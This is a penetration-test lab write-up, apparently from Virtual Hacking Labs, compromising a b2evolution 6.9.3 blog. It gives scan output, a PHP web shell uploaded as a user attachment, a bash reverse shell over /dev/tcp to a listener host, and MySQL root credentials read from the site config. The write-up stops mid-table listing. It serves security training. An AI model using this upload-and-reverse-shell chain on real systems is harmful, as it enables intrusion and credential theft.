VHL — PMV02
Web · Medium · Linux
b2evolution blog CMS on Ubuntu. Authenticated file manager abuse and PHP filter injection lead to remote code execution.
February 17, 2025, Virtual Hacking Labs
#b2evolution #File Manager #PHP #RCE

nmap

nmap -sC -sV -T4 -A -Pn -p- --open 10.11.1.156
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-17 08:49 EST
Nmap scan report for 10.11.1.156
Host is up (0.020s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 78:b4:1f:1c:73:21:67:69:e2:6e:52:db:fe:b9:56:6d (RSA)
| 256 d5:54:39:35:a0:73:4e:27:45:e4:28:59:cc:1e:2f:3d (ECDSA)
|_ 256 d3:f8:1d:a0:a6:45:58:cb:35:43:19:c5:30:4f:16:99 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-title: Homepage Title
|_Requested resource was http://10.11.1.156/index.php
|_http-generator: b2evolution 6.9.3-stable
|_http-server-header: Apache/2.4.41 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=2/17%OT=22%CT=1%CU=35904%PV=Y%DS=2%DC=I%G=Y%TM=67B3
OS:3E99%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10D%TI=Z%II=I%TS=A)OPS(O
OS:1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4ST11N
OS:W7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R
OS:=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%
OS:RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%
OS:Q=)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK
OS:=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 20.18 ms 10.11.1.156
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.54 seconds

directory search

feroxbuster --url http://10.11.1.156
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.3
───────────────────────────┬──────────────────────
🎯 Target Url │ http://10.11.1.156
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403 GET 9l 28w 276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 9l 31w 273c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301 GET 0l 0w 0c http://10.11.1.156/ => http://10.11.1.156/index.php
301 GET 9l 28w 308c http://10.11.1.156/inc => http://10.11.1.156/inc/
301 GET 9l 28w 310c http://10.11.1.156/skins => http://10.11.1.156/skins/
301 GET 9l 28w 309c http://10.11.1.156/cron => http://10.11.1.156/cron/
301 GET 9l 28w 309c http://10.11.1.156/conf => http://10.11.1.156/conf/
301 GET 9l 28w 310c http://10.11.1.156/media => http://10.11.1.156/media/
301 GET 9l 28w 312c http://10.11.1.156/plugins => http://10.11.1.156/plugins/
301 GET 9l 28w 311c http://10.11.1.156/_cache => http://10.11.1.156/_cache/
301 GET 9l 28w 314c http://10.11.1.156/inc/tools => http://10.11.1.156/inc/tools/
301 GET 9l 28w 314c http://10.11.1.156/inc/users => http://10.11.1.156/inc/users/
200 GET 1l 7w 41c http://10.11.1.156/inc/tools/phpbbimport.ctrl.php
200 GET 1l 7w 41c http://10.11.1.156/inc/tools/model/_email.funcs.php
200 GET 1l 7w 41c http://10.11.1.156/inc/tools/model/_syslog.class.php
200 GET 1l 7w 41c http://10.11.1.156/inc/tools/model/_emailaddresscache.class.php
200 GET 1l 7w 41c http://10.11.1.156/inc/tools/model/_emailaddress.class.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/invitations.ctrl.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/userfieldsgroups.ctrl.php
200 GET 1l 7w 41c http://10.11.1.156/inc/tools/model/_system.funcs.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/userfields.ctrl.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/registration.ctrl.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/account_close.ctrl.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/user.ctrl.php
200 GET 1l 7w 41c http://10.11.1.156/inc/tools/model/_wp.funcs.php
200 GET 1l 7w 41c http://10.11.1.156/inc/links/model/_linkcache.class.php
200 GET 1l 7w 41c http://10.11.1.156/inc/links/views/_link_list.inc.php
200 GET 1l 7w 41c http://10.11.1.156/inc/links/views/_link_list.view.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/views/_user_avatar.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/views/_group.view.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/views/_organization.view.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/views/_registration.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/views/_user_groups.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/views/_account_close_setting.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/views/_user_report.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/views/_user_list.view.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/views/_userfields.view.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/views/_organization_user_remove.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/views/_settings.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/views/_organization_user.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/views/_user_preferences.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/views/_group.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/views/_userfieldsgroup.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/views/_organization.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/views/_user_deldata.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/views/_user_crop.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/views/_user_stats.view.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/views/_display.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/views/_user_advanced.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/views/_user_admin.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/views/_userfield.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/views/_user_password.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/views/_invitation.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/views/_invitation.view.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/views/_user_profile_visits.view.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/views/_organization_user_edit.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/views/_user_subscriptions.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/views/_group_coll_perm.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/views/_user_activity.view.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/views/_user_identity.form.php
301 GET 9l 28w 313c http://10.11.1.156/inc/cron => http://10.11.1.156/inc/cron/
200 GET 1l 7w 41c http://10.11.1.156/inc/cron/_cron.funcs.php
200 GET 1l 7w 41c http://10.11.1.156/inc/cron/cronjobs.ctrl.php
200 GET 1l 7w 41c http://10.11.1.156/inc/cron/views/_cronjob.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/cron/jobs/_cleanup_jobs.job.php
200 GET 1l 7w 41c http://10.11.1.156/inc/cron/jobs/_comment_notifications.job.php
200 GET 1l 7w 41c http://10.11.1.156/inc/cron/jobs/_activate_account_reminder.job.php
200 GET 1l 7w 41c http://10.11.1.156/inc/cron/jobs/_post_by_email.job.php
200 GET 1l 7w 41c http://10.11.1.156/inc/cron/jobs/_process_hitlog.job.php
200 GET 1l 7w 41c http://10.11.1.156/inc/cron/jobs/_antispam_poll.job.php
200 GET 1l 7w 41c http://10.11.1.156/inc/cron/jobs/_heavy_db_maintenance.job.php
200 GET 1l 7w 41c http://10.11.1.156/inc/cron/views/_cronjob.view.php
200 GET 1l 7w 41c http://10.11.1.156/inc/cron/jobs/_prune_page_cache.job.php
200 GET 1l 7w 41c http://10.11.1.156/inc/cron/model/_post_by_mail.funcs.php
200 GET 1l 7w 41c http://10.11.1.156/inc/cron/jobs/_comment_moderation_reminder.job.php
200 GET 1l 7w 41c http://10.11.1.156/inc/cron/jobs/_monthly_alert_old_contents.job.php
200 GET 1l 7w 41c http://10.11.1.156/inc/cron/jobs/_test.job.php
200 GET 1l 7w 41c http://10.11.1.156/inc/cron/views/_cronjob_list.view.php
200 GET 1l 7w 41c http://10.11.1.156/inc/cron/jobs/_error_test.job.php
200 GET 1l 7w 41c http://10.11.1.156/inc/cron/jobs/_post_notifications.job.php
200 GET 1l 7w 41c http://10.11.1.156/inc/cron/jobs/_post_moderation_reminder.job.php
200 GET 1l 7w 41c http://10.11.1.156/inc/cron/jobs/_unread_message_reminder.job.php
200 GET 1l 7w 41c http://10.11.1.156/inc/cron/jobs/_prune_hits_sessions.job.php
200 GET 1l 7w 41c http://10.11.1.156/inc/cron/model/_decode_returned_emails.funcs.php
200 GET 1l 7w 41c http://10.11.1.156/inc/cron/jobs/_prune_recycled_comments.job.php
200 GET 1l 7w 41c http://10.11.1.156/inc/cron/jobs/_decode_returned_emails.job.php
200 GET 1l 7w 41c http://10.11.1.156/inc/cron/jobs/_light_db_maintenance.job.php
200 GET 1l 7w 41c http://10.11.1.156/inc/cron/model/_cronjob.class.php
200 GET 1l 7w 41c http://10.11.1.156/skins/basic/_item_content.inc.php
200 GET 1l 7w 41c http://10.11.1.156/skins/basic/access_requires_login.main.php
301 GET 9l 28w 317c http://10.11.1.156/media/shared => http://10.11.1.156/media/shared/
200 GET 7l 48w 260c http://10.11.1.156/skins/basic/item.css
200 GET 1l 7w 41c http://10.11.1.156/skins/basic/access_denied.main.php
301 GET 9l 28w 316c http://10.11.1.156/media/users => http://10.11.1.156/media/users/
200 GET 1l 7w 41c http://10.11.1.156/skins/basic/_item_feedback.inc.php
301 GET 9l 28w 316c http://10.11.1.156/inc/widgets => http://10.11.1.156/inc/widgets/
200 GET 1l 7w 41c http://10.11.1.156/inc/widgets/views/_widget_list.view.php
301 GET 9l 28w 320c http://10.11.1.156/inc/maintenance => http://10.11.1.156/inc/maintenance/
200 GET 1l 7w 41c http://10.11.1.156/inc/maintenance/backup.ctrl.php
301 GET 9l 28w 315c http://10.11.1.156/inc/xmlrpc => http://10.11.1.156/inc/xmlrpc/
301 GET 9l 28w 314c http://10.11.1.156/inc/links => http://10.11.1.156/inc/links/
301 GET 9l 28w 317c http://10.11.1.156/inc/settings => http://10.11.1.156/inc/settings/
301 GET 9l 28w 314c http://10.11.1.156/inc/skins => http://10.11.1.156/inc/skins/
200 GET 1l 7w 41c http://10.11.1.156/inc/cron/jobs/_email_campaign.job.php
200 GET 1l 7w 41c http://10.11.1.156/inc/settings/model/_generalsettings.class.php
200 GET 1l 7w 41c http://10.11.1.156/inc/settings/model/_abstractsettings.class.php
200 GET 1l 7w 41c http://10.11.1.156/inc/settings/views/_xmlrpc.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/settings/views/_eblog.form.php
301 GET 9l 28w 318c http://10.11.1.156/inc/dashboard => http://10.11.1.156/inc/dashboard/
200 GET 1l 7w 41c http://10.11.1.156/inc/dashboard/dashboard.ctrl.php
200 GET 1l 7w 41c http://10.11.1.156/inc/dashboard/model/_dashboard.funcs.php
200 GET 1l 7w 41c http://10.11.1.156/inc/maintenance/upgrade.ctrl.php
200 GET 1l 7w 41c http://10.11.1.156/inc/sessions/goals.ctrl.php
200 GET 1l 7w 41c http://10.11.1.156/inc/polls/_polls.init.php
200 GET 1l 7w 41c http://10.11.1.156/inc/polls/polls.ctrl.php
301 GET 9l 28w 312c http://10.11.1.156/locales => http://10.11.1.156/locales/
301 GET 9l 28w 316c http://10.11.1.156/skins/basic => http://10.11.1.156/skins/basic/
200 GET 1l 7w 41c http://10.11.1.156/skins/basic/help.main.php
200 GET 1l 7w 201c http://10.11.1.156/skins/basic/img/icon_minipost.gif
200 GET 1l 7w 41c http://10.11.1.156/skins/basic/msgform.main.php
301 GET 9l 28w 316c http://10.11.1.156/media/blogs => http://10.11.1.156/media/blogs/
301 GET 9l 28w 321c http://10.11.1.156/media/blogs/home => http://10.11.1.156/media/blogs/home/
200 GET 1l 7w 41c http://10.11.1.156/inc/widgets/_widgets.funcs.php
200 GET 1l 7w 41c http://10.11.1.156/inc/widgets/views/_widget_list_available.view.php
301 GET 9l 28w 314c http://10.11.1.156/inc/items => http://10.11.1.156/inc/items/
200 GET 1l 7w 41c http://10.11.1.156/inc/items/item_types.ctrl.php
200 GET 1l 7w 41c http://10.11.1.156/inc/items/item_tags.ctrl.php
200 GET 1l 7w 41c http://10.11.1.156/inc/items/item_statuses.ctrl.php
200 GET 1l 7w 41c http://10.11.1.156/inc/items/items.ctrl.php
200 GET 1l 7w 41c http://10.11.1.156/inc/items/views/_itemtypes.view.php
200 GET 1l 7w 41c http://10.11.1.156/inc/items/views/_file_create_posts.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/items/views/_itemtag.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/items/views/_item_list_table.view.php
200 GET 1l 7w 41c http://10.11.1.156/inc/items/views/_itemstatuses.view.php
200 GET 1l 7w 41c http://10.11.1.156/inc/items/views/_item_history_compare.view.php
200 GET 1l 7w 41c http://10.11.1.156/inc/items/views/_item_expert.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/items/model/_itemlist.class.php
200 GET 1l 7w 41c http://10.11.1.156/inc/items/model/_itemcache.class.php
200 GET 1l 7w 41c http://10.11.1.156/inc/items/model/_itemtype.class.php
301 GET 9l 28w 319c http://10.11.1.156/_cache/plugins => http://10.11.1.156/_cache/plugins/
301 GET 9l 28w 319c http://10.11.1.156/_cache/general => http://10.11.1.156/_cache/general/
200 GET 1l 7w 41c http://10.11.1.156/inc/maintenance/_maintenance.init.php
200 GET 1l 7w 41c http://10.11.1.156/inc/maintenance/model/_maintenance.funcs.php
200 GET 1l 7w 41c http://10.11.1.156/inc/maintenance/model/_backup.class.php
200 GET 1l 7w 41c http://10.11.1.156/inc/maintenance/model/_maintenance.install.php
200 GET 3292l 18005w 1537203c http://10.11.1.156/media/blogs/home/maritime-hotel-building-facade-87635.jpeg
301 GET 9l 28w 317c http://10.11.1.156/inc/sessions => http://10.11.1.156/inc/sessions/
301 GET 9l 28w 314c http://10.11.1.156/inc/polls => http://10.11.1.156/inc/polls/
200 GET 1l 7w 41c http://10.11.1.156/inc/skins/views/_coll_skin_settings.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/skins/views/_coll_skin.view.php
301 GET 9l 28w 320c http://10.11.1.156/inc/skins/model => http://10.11.1.156/inc/skins/model/
200 GET 1l 7w 41c http://10.11.1.156/inc/skins/model/_skincache.class.php
301 GET 9l 28w 310c http://10.11.1.156/htsrv => http://10.11.1.156/htsrv/
301 GET 9l 28w 320c http://10.11.1.156/inc/collections => http://10.11.1.156/inc/collections/
200 GET 1l 7w 41c http://10.11.1.156/inc/collections/collections.ctrl.php
200 GET 1l 7w 41c http://10.11.1.156/inc/collections/coll_settings.ctrl.php
200 GET 1l 7w 41c http://10.11.1.156/inc/collections/_search.funcs.php
200 GET 1l 7w 41c http://10.11.1.156/inc/collections/model/_blog.funcs.php
200 GET 1l 7w 41c http://10.11.1.156/inc/collections/model/_blog.class.php
200 GET 1l 7w 41c http://10.11.1.156/inc/collections/views/_coll_list.view.php
200 GET 1l 7w 41c http://10.11.1.156/inc/collections/views/_coll_advanced.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/collections/views/_coll_type.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/collections/views/_coll_seo.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/collections/views/_coll_general.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/collections/views/_coll_plugin_settings.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/collections/_demo_content.funcs.php
200 GET 1l 7w 41c http://10.11.1.156/inc/skins/views/_skin_list.view.php
301 GET 9l 28w 316c http://10.11.1.156/inc/locales => http://10.11.1.156/inc/locales/
200 GET 1l 7w 41c http://10.11.1.156/inc/locales/_locale.funcs.php
200 GET 0l 0w 0c http://10.11.1.156/inc/locales/_pofile.class.php
200 GET 1l 7w 41c http://10.11.1.156/inc/locales/locales.ctrl.php
301 GET 9l 28w 320c http://10.11.1.156/inc/skins/views => http://10.11.1.156/inc/skins/views/
200 GET 1l 7w 41c http://10.11.1.156/inc/skins/views/_skin_list_available.view.php
200 GET 1l 7w 41c http://10.11.1.156/inc/skins/views/_coll_sel_skin.view.php
200 GET 1l 7w 41c http://10.11.1.156/inc/skins/views/_skin.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/skins/model/_skin.class.php
301 GET 9l 28w 327c http://10.11.1.156/_cache/plugins/tinymce => http://10.11.1.156/_cache/plugins/tinymce/
301 GET 9l 28w 317c http://10.11.1.156/inc/regional => http://10.11.1.156/inc/regional/
200 GET 1l 7w 41c http://10.11.1.156/inc/regional/countries.ctrl.php
301 GET 9l 28w 321c http://10.11.1.156/media/users/dave => http://10.11.1.156/media/users/dave/
200 GET 368l 2172w 163870c http://10.11.1.156/media/users/dave/dave.jpg
200 GET 302l 1705w 121351c http://10.11.1.156/media/users/paul/paul.jpg
200 GET 1l 7w 41c http://10.11.1.156/inc/locales/translation.ctrl.php
200 GET 1l 7w 41c http://10.11.1.156/inc/locales/_locale_settings.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/locales/model/_translation.funcs.php
200 GET 1l 7w 41c http://10.11.1.156/inc/messaging/threads.ctrl.php
200 GET 1l 7w 41c http://10.11.1.156/inc/_core/_template.funcs.php
301 GET 9l 28w 311c http://10.11.1.156/xmlsrv => http://10.11.1.156/xmlsrv/
301 GET 9l 28w 311c http://10.11.1.156/_tests => http://10.11.1.156/_tests/
301 GET 9l 28w 316c http://10.11.1.156/_tests/temp => http://10.11.1.156/_tests/temp/
301 GET 9l 28w 319c http://10.11.1.156/_tests/install => http://10.11.1.156/_tests/install/
500 GET 0l 0w 0c http://10.11.1.156/_tests/classes/simpletest/EvoInstallUnitTestCase.class.php
301 GET 9l 28w 319c http://10.11.1.156/_tests/classes => http://10.11.1.156/_tests/classes/
301 GET 9l 28w 321c http://10.11.1.156/media/users/paul => http://10.11.1.156/media/users/paul/
301 GET 9l 28w 318c http://10.11.1.156/inc/messaging => http://10.11.1.156/inc/messaging/
301 GET 9l 28w 314c http://10.11.1.156/inc/_core => http://10.11.1.156/inc/_core/
🚨 Caught ctrl+c 🚨 saving scan state to ferox-http_10_11_1_156-1739884445.state ...
[##>-----------------] - 3m 75005/510443 13m found:194 errors:16213
[####>---------------] - 3m 7431/30000 47/s http://10.11.1.156/
[###>----------------] - 3m 4977/30000 31/s http://10.11.1.156/inc/
[#####>--------------] - 3m 8800/30000 55/s http://10.11.1.156/skins/
[###>----------------] - 3m 5907/30000 37/s http://10.11.1.156/cron/
[####>---------------] - 3m 6378/30000 40/s http://10.11.1.156/conf/
[###>----------------] - 3m 5953/30000 38/s http://10.11.1.156/media/
[####>---------------] - 3m 6401/30000 41/s http://10.11.1.156/media/users/
[###>----------------] - 3m 5341/30000 34/s http://10.11.1.156/plugins/
[###>----------------] - 3m 5797/30000 38/s http://10.11.1.156/_cache/
[####################] - 7s 30000/30000 4268/s http://10.11.1.156/inc/xmlrpc/ => Directory listing
[####################] - 7s 30000/30000 4262/s http://10.11.1.156/inc/xmlrpc/model/ => Directory listing
[####################] - 7s 30000/30000 4266/s http://10.11.1.156/inc/tools/ => Directory listing
[####################] - 7s 30000/30000 4267/s http://10.11.1.156/inc/links/ => Directory listing
[####################] - 7s 30000/30000 4262/s http://10.11.1.156/inc/users/ => Directory listing
[####################] - 7s 30000/30000 4273/s http://10.11.1.156/inc/tools/model/ => Directory listing
[####################] - 7s 30000/30000 4263/s http://10.11.1.156/inc/links/model/ => Directory listing
[####################] - 7s 30000/30000 4263/s http://10.11.1.156/inc/links/views/ => Directory listing
[####################] - 0s 30000/30000 243902/s http://10.11.1.156/inc/users/views/ => Directory listing
[##>-----------------] - 3m 3587/30000 23/s http://10.11.1.156/inc/skins/
[####################] - 0s 30000/30000 555556/s http://10.11.1.156/inc/cron/ => Directory listing
[####################] - 0s 30000/30000 405405/s http://10.11.1.156/inc/cron/model/ => Directory listing
[####################] - 0s 30000/30000 410959/s http://10.11.1.156/inc/cron/views/ => Directory listing
[####################] - 7s 30000/30000 4498/s http://10.11.1.156/inc/cron/jobs/ => Directory listing
[####################] - 7s 30000/30000 4271/s http://10.11.1.156/skins/basic/ => Directory listing
[##>-----------------] - 2m 3523/30000 24/s http://10.11.1.156/media/blogs/
[####################] - 0s 30000/30000 625000/s http://10.11.1.156/media/shared/ => Directory listing
[####################] - 7s 30000/30000 4002/s http://10.11.1.156/media/shared/global/ => Directory listing
[####################] - 7s 30000/30000 4270/s http://10.11.1.156/inc/widgets/ => Directory listing
[####################] - 7s 30000/30000 4272/s http://10.11.1.156/inc/widgets/views/ => Directory listing
[####################] - 0s 30000/30000 103806/s http://10.11.1.156/_cache/plugins/ => Directory listing
[##>-----------------] - 2m 3081/30000 21/s http://10.11.1.156/_cache/plugins/tinymce/
[####################] - 7s 30000/30000 4207/s http://10.11.1.156/inc/maintenance/ => Directory listing
[####################] - 0s 30000/30000 109890/s http://10.11.1.156/_cache/general/ => Directory listing
[####################] - 7s 30000/30000 4270/s http://10.11.1.156/inc/settings/ => Directory listing
[####################] - 1s 30000/30000 58140/s http://10.11.1.156/inc/settings/views/ => Directory listing
[####################] - 1s 30000/30000 58252/s http://10.11.1.156/inc/settings/model/ => Directory listing
[####################] - 0s 30000/30000 638298/s http://10.11.1.156/inc/dashboard/ => Directory listing
[####################] - 0s 30000/30000 666667/s http://10.11.1.156/inc/dashboard/model/ => Directory listing
[####################] - 7s 30000/30000 4269/s http://10.11.1.156/inc/sessions/ => Directory listing
[####################] - 7s 30000/30000 4267/s http://10.11.1.156/inc/polls/ => Directory listing
[#>------------------] - 2m 2770/30000 19/s http://10.11.1.156/locales/
[####################] - 0s 30000/30000 588235/s http://10.11.1.156/skins/basic/img/ => Directory listing
[####################] - 4s 30000/30000 7280/s http://10.11.1.156/media/blogs/home/ => Directory listing
[####################] - 0s 30000/30000 428571/s http://10.11.1.156/inc/items/ => Directory listing
[####################] - 7s 30000/30000 4267/s http://10.11.1.156/inc/items/views/ => Directory listing
[####################] - 7s 30000/30000 4251/s http://10.11.1.156/inc/items/model/ => Directory listing
[####################] - 7s 30000/30000 4511/s http://10.11.1.156/inc/maintenance/model/ => Directory listing
[####################] - 7s 30000/30000 4284/s http://10.11.1.156/inc/skins/views/ => Directory listing
[####################] - 7s 30000/30000 4271/s http://10.11.1.156/inc/skins/model/ => Directory listing
[>-------------------] - 2m 1423/30000 11/s http://10.11.1.156/htsrv/
[####################] - 7s 30000/30000 4269/s http://10.11.1.156/inc/collections/ => Directory listing
[####################] - 7s 30000/30000 4274/s http://10.11.1.156/inc/collections/model/ => Directory listing
[####################] - 7s 30000/30000 4260/s http://10.11.1.156/inc/collections/views/ => Directory listing
[####################] - 7s 30000/30000 4264/s http://10.11.1.156/inc/locales/ => Directory listing

80

80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-title: Homepage Title
|_Requested resource was http://10.11.1.156/index.php
|_http-generator: b2evolution 6.9.3-stable
|_http-server-header: Apache/2.4.41 (Ubuntu)

b2evolution version 6.9.3 (from the http-generator meta tag nmap reports)

b2evolution arbitrary file upload
- https://www.exploit-db.com/exploits/41011
- register a user through the blog's registration form (the account used here is `test`)
- log in and upload a PHP file as an attachment; the shell.php used here takes the command to run from the GET parameter 0
- attachments land under the registering user's media folder, /media/users/test/ for this account, and Apache executes PHP there, so the upload runs directly:

http://10.11.1.156/media/users/test/comments/p20/shell.php?0=id

rev shell as www-data

GET /media/users/test/comments/p20/shell.php?0=bash+-c+'bash+-i+>%26+/dev/tcp/172.16.1.2/1234+0>%261' HTTP/1.1

(%26 is the URL-encoded & of bash's >& redirection; a listener on 172.16.1.2:1234 catches the shell)
www-data@pm:/tmp$ uname -a
uname -a
Linux pm 5.4.0-122-generic #138-Ubuntu SMP Wed Jun 22 15:00:31 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
www-data@pm:/tmp$ cat /etc/os-release
cat /etc/os-release
NAME="Ubuntu"
VERSION="20.04.4 LTS (Focal Fossa)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 20.04.4 LTS"
VERSION_ID="20.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=focal
UBUNTU_CODENAME=focal

linpeas
╔══════════╣ Searching passwords in config PHP files
'password' => 'B2pMdatAB4sE22!', // ...and password
// $install_password = 'easy';
'password' => 'demopass', // ...and password
// $install_password = 'easy';
{ // Password doesn't match: turn off debug mode:

╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
Linux version 5.4.0-122-generic (buildd@lcy02-amd64-095) (gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.1)) #138-Ubuntu SMP Wed Jun 22 15:00:31 UTC 2022
Distributor ID: Ubuntu
Description: Ubuntu 20.04.4 LTS
Release: 20.04
Codename: focal

╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version
Sudo version 1.8.31

╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 511 *:80 *:*
tcp LISTEN 0 128 [::]:22 [::]:*

╔══════════╣ MySQL version
mysql Ver 15.1 Distrib 10.5.8-MariaDB, for debian-linux-gnu (x86_64) using readline 5.2

MariaDB listens on 127.0.0.1:3306 only, so it is reachable from the www-data shell but not from the network.

config file

www-data@pm:/var/www/html/conf$ cat _basic_config.php
$db_config = array(
'user' => 'root', // your MySQL username
'password' => 'B2pMdatAB4sE22!', // ...and password
'name' => 'b2evolution', // the name of the database
'host' => 'localhost', // MySQL Server (typically 'localhost')
);

creds
root:B2pMdatAB4sE22! (MySQL root, from conf/_basic_config.php)

mysql

www-data@pm:/var/www/html/conf$ mysql -u root -p'B2pMdatAB4sE22!'
MariaDB [(none)]> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| b2evolution |
| information_schema |
| mysql |
| performance_schema |
+--------------------+
4 rows in set (0.002 sec)
MariaDB [(none)]> use b2evolution
use b2evolution
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [b2evolution]> show tables;
show tables;
+----------------------------------------+
| Tables_in_b2evolution |
+----------------------------------------+
| evo_antispam__iprange |
| evo_antispam__keyword |
| evo_basedomains |
| evo_bloggroups |
| evo_blogs |
| evo_blogusers |
| evo_categories |
| evo_coll_favs |
| evo_coll_settings |
| evo_comments |
| evo_comments__prerendering |
| evo_comments__votes |
| evo_cron__log |
| evo_cron__task |
| evo_email__address |
| evo_email__campaign |
| evo_email__campaign_send |
| evo_email__log |
| evo_email__returns |
| evo_files |
| evo_filetypes |
| evo_global__cache |
| evo_groups |
| evo_groups__groupsettings |
| evo_hitlog |
| evo_hits__aggregate |
| evo_hits__aggregate_sessions |
| evo_i18n_original_string |
| evo_i18n_translated_string |
| evo_items__item |
| evo_items__item_settings |
| evo_items__itemtag |
| evo_items__prerendering |
| evo_items__status |
| evo_items__status_type |
| evo_items__subscriptions |
| evo_items__tag |
| evo_items__type |
| evo_items__type_coll |
| evo_items__type_custom_field |
| evo_items__user_data |
| evo_items__version |
| evo_items__votes |
| evo_links |
| evo_links__vote |
| evo_locales |
| evo_messaging__contact |
| evo_messaging__contact_groups |
| evo_messaging__contact_groupusers |
| evo_messaging__message |
| evo_messaging__prerendering |
| evo_messaging__thread |
